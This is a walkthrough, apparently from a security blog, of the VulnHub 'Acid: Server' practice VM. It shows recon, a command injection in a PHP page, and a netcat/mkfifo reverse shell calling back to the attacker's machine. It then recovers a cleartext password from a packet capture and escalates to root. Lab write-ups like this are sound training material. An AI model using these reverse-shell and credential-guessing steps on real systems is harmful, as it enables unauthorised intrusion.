VulnHub-Acid: Server

Published 2023-04-18 17:13:11, author: HKalpa

Target VM: https://www.vulnhub.com/entry/acid-server,125/

Goal: Escalate the privileges to root and capture the flag.

In plain language: escalate privileges to root and capture the flag.

I. Information Gathering

1. Host discovery

nmap -sn 192.168.11.0/24

-sn: ping scan, port scanning disabled

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.11.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 20:04 CST
Nmap scan report for 192.168.11.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.11.136
Host is up (0.0010s latency).
MAC Address: 00:0C:29:6D:91:7D (VMware)
Nmap scan report for 192.168.11.254
Host is up (0.00065s latency).
MAC Address: 00:50:56:FA:34:33 (VMware)
Nmap scan report for 192.168.11.131
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.93 seconds

2. Port scanning

nmap -sV -T4 -A -p- 192.168.11.136

-sV: probe open ports to determine service/version information

-T<0-5>: set the timing template (higher is faster)

-A: enable OS detection, version detection, script scanning and traceroute

-p <port ranges>: scan only the specified ports

┌──(root㉿kali)-[~]
└─# nmap -sV -T4 -A -p- 192.168.11.136
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-16 20:06 CST
Nmap scan report for 192.168.11.136
Host is up (0.0016s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
33447/tcp open http   Apache httpd 2.4.10 ((Ubuntu))
|_http-title: /Challenge
|_http-server-header: Apache/2.4.10 (Ubuntu)
MAC Address: 00:0C:29:6D:91:7D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.56 ms 192.168.11.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.84 seconds

Port 33447

It serves a web application. Visiting http://192.168.11.136:33447/ and searching for CVEs related to the site template and the Apache version turned up nothing.

whatweb http://192.168.11.136:33447/

┌──(root㉿kali)-[~]
└─# whatweb http://192.168.11.136:33447/
http://192.168.11.136:33447/ [200 OK] Apache[2.4.10], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.11.136], Title[/Challenge]

Nothing of value on the page itself; looking at the source, the title looks like a directory name.

Note:

  • The last line of the source contains a string: 0x643239334c6d70775a673d3d

  • Hex-decoding it reveals a filename: wow.gif

  • After downloading the file (wow.gif) and opening it as text, the last line is:

    37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

  • Converted from hex to ASCII: 7aee0f6d588ed9905ee37f16a7c610d4

  • Looked up as an MD5 hash: 63425

    Lookup site: MD5在线免费破解 (a free online MD5 lookup service)

  • Recalling that index.html talked about using a key to open the magic door, this numeric string should be the key to that door (it turned out to be of no use at all).

Visiting http://192.168.11.136:33447/Challenge/ reveals a login page (tried to exploit it).

Scanning directories with dirsearch also found nothing useful.

dirsearch -u http://192.168.11.136:33447/

-u URL, --url=URL: target URL

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.11.136:33447/

_|. _ _ _ _ _ _|_   v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.11.136-33447/-_23-04-17_10-21-10.txt

Error Log: /root/.dirsearch/logs/errors-23-04-17_10-21-10.log

Target: http://192.168.11.136:33447/

[10:21:10] Starting:
[10:21:13] 403 - 303B - /.ht_wsr.txt                                    
[10:21:13] 403 - 306B - /.htaccess.save                                  
[10:21:13] 403 - 306B - /.htaccess.bak1
[10:21:13] 403 - 304B - /.htaccess_sc
[10:21:13] 403 - 304B - /.htaccessOLD
[10:21:13] 403 - 304B - /.htaccessBAK
[10:21:13] 403 - 306B - /.htaccess.orig
[10:21:13] 403 - 307B - /.htaccess_extra
[10:21:13] 403 - 306B - /.htaccess_orig
[10:21:13] 403 - 297B - /.html                                          
[10:21:13] 403 - 296B - /.htm
[10:21:14] 403 - 306B - /.htpasswd_test
[10:21:14] 403 - 302B - /.htpasswds
[10:21:14] 403 - 305B - /.htaccessOLD2
[10:21:14] 403 - 303B - /.httr-oauth                                    
[10:21:14] 403 - 296B - /.php                                            
[10:21:14] 403 - 297B - /.php3                                          
[10:21:16] 403 - 308B - /.htaccess.sample                                
[10:21:23] 301 - 323B - /css -> http://192.168.11.136:33447/css/        
[10:21:26] 301 - 326B - /images -> http://192.168.11.136:33447/images/  
[10:21:26] 403 - 299B - /images/
[10:21:26] 200 - 899B - /index.html                                      
[10:21:32] 403 - 306B - /server-status/                                  
[10:21:32] 403 - 305B - /server-status                                    

Task Completed

II. Reverse Shell

1. Vulnerability discovery

Tested the http://192.168.11.136:33447/Challenge/ page; injection attempts and the like all failed, so wfuzz was used to scan the site directories.

wfuzz --hc 404 -w /usr/share/dirb/wordlists/big.txt http://192.168.11.136:33447/Challenge/FUZZ.php

--hc/hl/hw/hh N[,N]+: hide responses with the specified code/lines/words/chars (use BBB to take the value from the baseline)

-w wordlist: specify a wordlist file (alias for -z file,wordlist)

┌──(root㉿kali)-[~/下载]
└─# wfuzz --hc 404 -w /usr/share/dirb/wordlists/big.txt http://192.168.11.136:33447/Challenge/FUZZ.php
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.11.136:33447/Challenge/FUZZ.php
Total requests: 20469

=====================================================================
ID           Response   Lines   Word       Chars       Payload
=====================================================================

000000015:   403       11 L     32 W       315 Ch     ".htaccess"
000000016:   403       11 L     32 W       315 Ch     ".htpasswd"
000003963:   200       17 L     33 W       496 Ch     "cake"
000007060:   200       12 L     27 W       309 Ch     "error"
000009563:   200       40 L     80 W       1333 Ch     "index"
000009548:   302       0 L     0 W       0 Ch       "include"

Total time: 10.58594
Processed Requests: 20469
Filtered Requests: 20463
Requests/sec.: 1933.600

At http://192.168.11.136:33447/Challenge/cake.php the page title again looks like a directory name.

So keep running wfuzz.

wfuzz -c --hc 404 -w /usr/share/dirb/wordlists/big.txt http://192.168.11.136:33447/Challenge/Magic_Box/FUZZ.php

-c: colored output

┌──(root㉿kali)-[~/下载]
└─# wfuzz -c --hc 404 -w /usr/share/dirb/wordlists/big.txt http://192.168.11.136:33447/Challenge/Magic_Box/FUZZ.php
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.11.136:33447/Challenge/Magic_Box/FUZZ.php
Total requests: 20469

=====================================================================
ID           Response   Lines   Word       Chars       Payload
=====================================================================

000000016:   403       11 L     32 W       325 Ch     ".htpasswd"
000000015:   403       11 L     32 W       325 Ch     ".htaccess"
000004958:   200       17 L     54 W       594 Ch     "command"
000011134:   200       0 L     0 W       0 Ch       "low"

Total time: 0
Processed Requests: 20469
Filtered Requests: 20465
Requests/sec.: 0

Finally, the page http://192.168.11.136:33447/Challenge//Magic_Box/command.php turns out to have command injection.

2. Exploitation

Use nc to get a reverse shell

  • Listen on Kali (the port must match the one used in the reverse shell below)

    nc -lvnp 5868

    ┌──(root㉿kali)-[~]
    └─# nc -lvnp 5868
    listening on [any] 5868 ...
  • Reverse shell from the target

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.131 5868 >/tmp/f

3. Upgrade to a full TTY

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo

fg

ls

export SHELL=/bin/bash

export TERM=screen

stty rows 33 columns 145

reset

┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.136] 56586
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@acid:/var/www/html/Challenge/Magic_Box$ ^Z
[1]+ 已停止               nc -lvnp 5868

┌──(root㉿kali)-[~]
└─# stty raw -echo

┌──(root㉿kali)-[~]
└─#
nc -lvnp 5868
            ls
command.php       command2.php.save   low.php tails.php
command.php.save command2.php.save.1 proc
www-data@acid:/var/www/html/Challenge/Magic_Box$ export SHELL=/bin/bash
www-data@acid:/var/www/html/Challenge/Magic_Box$ export TERM=screen
www-data@acid:/var/www/html/Challenge/Magic_Box$ stty rows 33 columns 145
www-data@acid:/var/www/html/Challenge/Magic_Box$ reset

III. Privilege Escalation

/etc/passwd shows three users of interest: root, acid and saman

root:x:0:0:root:/root:/bin/bash
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
saman:x:1001:1001:,,,:/home/saman:/bin/bash

Look at the files owned by the acid and saman users respectively

find / -user [user] 2>/dev/null

  • 2: standard error

  • /dev/null: the null device

  • 2>/dev/null: redirect standard error to the null device

Among the files owned by acid there is a packet capture whose name says it is a hint (the magic-door key above said the same), so let's try it.

www-data@acid:/var/www/html/Challenge/Magic_Box$ find / -user acid 2>/dev/null
/sbin/raw_vs_isi/hint.pcapng
......

Start an HTTP server on the target

python3 -m http.server

www-data@acid:/sbin/raw_vs_isi$ cd /sbin/raw_vs_isi/
www-data@acid:/sbin/raw_vs_isi$ ls -al
total 816
drwxr-xr-x 2 root root 4096 Aug 7 2015 .
drwxr-xr-x 3 root root 12288 Aug 8 2015 ..
-rwxr--r-- 1 acid acid 818744 Aug 7 2015 hint.pcapng
www-data@acid:/sbin/raw_vs_isi$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...

Fetch the capture on Kali

wget http://192.168.11.136:8000/hint.pcapng

┌──(root㉿kali)-[~]
└─# wget http://192.168.11.136:8000/hint.pcapng
--2023-04-17 15:11:31-- http://192.168.11.136:8000/hint.pcapng
正在连接 192.168.11.136:8000... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:818744 (800K) [application/octet-stream]
正在保存至: “hint.pcapng”

hint.pcapng 100%[===================================================================>] 799.55K --.-KB/s 用时 0.03s

2023-04-17 15:11:31 (30.4 MB/s) - 已保存 “hint.pcapng” [818744/818744])

In the Wireshark display filter, enter tcp.stream eq 0 to select the first TCP stream (one complete TCP connection: three-way handshake and four-way teardown).

The TCP stream contains the saman user and its password in cleartext

  • Username: saman

  • Password: 1337hax0r

After switching to saman, sudo -i goes straight to root.

www-data@acid:/sbin/raw_vs_isi$ su saman 
Password:
saman@acid:/sbin/raw_vs_isi$ sudo -i
[sudo] password for saman:
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/
root@acid:~# id
uid=0(root) gid=0(root) groups=0(root)

The flag is in root's home directory

root@acid:~# ls -al
total 68
drwx------ 4 root root 4096 Aug 8 2015 .
drwxr-xr-x 23 root root 4096 Aug 8 2015 ..
-rw------- 1 root root 24584 Aug 8 2015 .bash_history
-rw-r--r-- 1 root root 3135 Aug 8 2015 .bashrc
drwx------ 3 root root 4096 Aug 6 2015 .config
drwx------ 3 root root 4096 Aug 6 2015 .dbus
-rw-r--r-- 1 root root 192 Aug 8 2015 flag.txt
-rw------- 1 root root 2027 Aug 7 2015 .mysql_history
-rw------- 1 root root 84 Aug 8 2015 .nano_history
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw-r--r-- 1 root root 66 Aug 6 2015 .selected_editor
root@acid:~# cat flag.txt


Dear Hax0r,


You have successfully completed the challenge.

I hope you like it.


FLAG NAME: "Acid@Makke@Hax0r"


Kind & Best Regards

-ACID
facebook: https://facebook.com/m.avinash143


root@acid:~#

Note: alternative privilege escalation

The string 1337 Hax0r seen on the http://192.168.11.136:33447/Challenge/Magic_Box/command.php page, with the space removed and lowercased, is saman's password.

So after getting a shell, one can directly try the usernames gathered during recon (root, acid, saman) with the passwords (1337Hax0r, 1337hax0r) and escalate all the way to root.


That concludes the box OvO